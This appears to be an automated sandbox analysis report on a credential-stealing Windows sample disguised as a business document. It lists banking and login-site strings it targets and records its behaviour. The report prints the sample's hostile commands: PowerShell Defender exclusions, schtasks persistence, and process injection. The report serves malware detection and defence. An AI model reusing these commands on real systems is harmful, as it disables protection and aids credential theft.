Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696501413s
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696501413f
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3733140235.0000000000E17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3733760891.0000000001546000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696501413s
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1278452695.0000000000619000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696501413o
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696501413f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 11_2_06929328 LdrInitializeThunk, 11_2_06929328
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe" Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Memory written: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Memory written: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe" Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe" Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp" Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Process created: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9536.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Process created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Queries volume information: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Queries volume information: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
